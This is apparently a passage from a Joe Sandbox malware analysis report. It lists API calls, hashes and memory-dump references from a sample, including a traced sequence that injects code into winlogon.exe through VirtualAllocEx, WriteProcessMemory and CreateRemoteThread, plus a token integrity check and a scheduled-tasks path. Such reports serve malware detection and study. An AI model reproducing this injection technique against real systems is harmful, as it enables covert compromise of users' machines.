                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: VUUU
                                                                                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                                                                                              • Opcode ID: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction ID: 83c8b6d4ae9392d60502dd360fb7ca1817b1c3f4776dddc770d92cd40da689bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FC1F571A4065647C728CF69C5902BAFBF1BF98310F08A12FD4D2D6B81E338E555CB55
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction ID: 49f4f21d9b48f79dac2c560b4f9f45e3af11d3fe5a8b8c575f21095663944224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 466217302083668FE711CF349998AAB7BE4EF9B342F448559E881C7372DB35C949C799
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction ID: c7ae1df08a76fa61e3c99c46e8343ff6a04015de72be0cc750c2f716a6a279e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F442D171900A499FDB14DFA8C880AEFBBF5EF4C308F14555EE446A7341D738A946CBA8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction ID: 296f88951ecf7cea7bff09f9537e53bf2d2ecc764958e0785ba560d75f276c2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6112E5306017849FEB25CF18C5906AEBBF1BF46310F16855AE8E54B792C338ED46CB56
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction ID: 373094f0e44d4ed5b4a76297d3e75846c5555569b6fb32489a2bef93388bd825
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C812D230A00B859FEF21CF18C590AAEB7F1FF95310F14855AE8A64B792C338AD46CB55
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction ID: cfa054cb93e044cdae65f2de48f0eb828664dc1768648188419bb013471483e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA12D530A057849FEB25CF18C490AAABBF1EF53314F15855EE8E54B391C338AD46CB66
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction ID: c484f8b887487c68eb1831faa77cd2835b2ef54b83a3a9b38c3ea20a6c7484b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA12D430A017859FEB21CF18C58079ABBF1FF96310F19855AE8A59B381D338ED46CB65
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction ID: 9417f9ed4064ddd1c3f6edb80d8f66b01d291d1ab21ea86703028fde516e46eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E02F530A007459FEB20CF28C6906AFB7F1FF41310F55855AF8A54B391D778A986CBA5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction ID: 448e8c8128ee218613f355b6a59d53b40018dab5e4ac80cca173ede8df55363b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4141C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction ID: 081832729734f64ca8943200ec232ae7a260b1d72c680c68a8391be1ada1e6fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9751D07150D3918BD321CF29C48066BBBE1ABD9314F084A7EF8D497352D778CA49CB92
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction ID: b4677f41d66d6811b44967b30f698def2232b76b1c2307f426304baac9f77722
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdf6d4a0cfe518c56610cbc80524ad7fcbb6d49a35438cb6cea347061e269f64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 472150339744B701E7908B768C8863277E3EFCB245FAF85B5D649C7652E23DE4029124
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction ID: f17dcb8967b96d5ed4dd8b06982efda1dc527591578653ebadaafebabbad66e2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c960c60330ea37f4af0813ec166c04039a4088d48b185995a0ca47779f0b5bce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5201C43F174E8D42852D642C1024AFA12405B9275A7D4062BEAD7D83E2EFCED8E7D08F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction ID: b1f166e1dc89a3f01e43aa2e4643af66497838ab6b388673c2e8518e001627dd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a5098dc99a450b7ee807eb59e07f73775cbb25fdf3b48f52af6f44802a00f1a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A301A2B59057189FEB20DF54DD857ABBBB4FB06304F40819DE98D97280C3B51A84CB96
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction ID: 7532f4c657dbcf864b1e0f3702b5c669a99d63d3a165ab0069a886a8ac68f27f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6330c77cc73779100b967b3bed00ed2b0f65b3f262f43be70dde04e2a63f31f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4AC04C36111850CFC642DB08E144D81B3E4EF05631B0A84C5A4055B621C234ED41CA40
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 004036CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7604DB30), ref: 00403717
